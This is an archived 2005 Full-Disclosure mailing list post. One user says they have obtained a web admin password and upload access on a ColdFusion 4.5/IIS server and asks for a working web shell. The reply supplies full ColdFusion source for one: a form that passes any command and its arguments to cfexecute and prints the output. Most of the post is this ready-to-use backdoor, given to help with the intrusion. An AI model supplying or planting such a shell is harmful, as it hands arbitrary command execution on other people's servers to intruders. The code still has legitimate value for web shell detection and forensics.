lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue May 10 09:32:57 2005
From: javier.reoyo at interdominios.com (Javier Reoyo)
Subject: coldfusion pentest

Hi fatb,


this is from mailing of securiteam. Try it.

  ColdFusion Web Shell
------------------------------------------------------------------------


SUMMARY



DETAILS

The following source code will generate a web based shell whenever it is
executed under the ColdFusion environment.

Tool source code:
< html>
< body>

< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
 < tr>
  < td>Command:</td>
  < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" </cfif>> < br></td>
 </tr>
 < tr>
  < td>Options:</td>
  < td> < input type=text name="opts" size=50 < cfif
isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
 </tr>
 < tr>
  < td>Timeout:</td>
  < td>< input type=text name="timeout" size=4 < cfif
isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
</cfif> > </td>
 </tr>
</table>
< input type=submit value="Exec" >
</FORM>

< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">
</cfexecute>
</cfsavecontent>
< pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:grutz@...gojango.net> Kurt
Grutzmacher.



========================================

----- Original Message ----- 
From: "fatb" <fatb@...urity.zz.ha.cn>
To: <pen-test@...urityfocus.com>
Cc: <full-disclosure@...ts.grok.org.uk>
Sent: Tuesday, May 10, 2005 4:43 AM
Subject: [Full-disclosure] coldfusion pentest


> Hi all guys
>
> I've successed get the admin's passwd of the web interface
>
> and I can upload any kinds of files to the server
>
> the server is running coldfusion 4.5 with iis 5.0
>
> but I can not find a coldfusion webshell to continue
>
> anybody could be kind enough to send me a  working coldfusion webshell
>
> thx in advanced!


----------------------------------------------------------------------------
----


> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ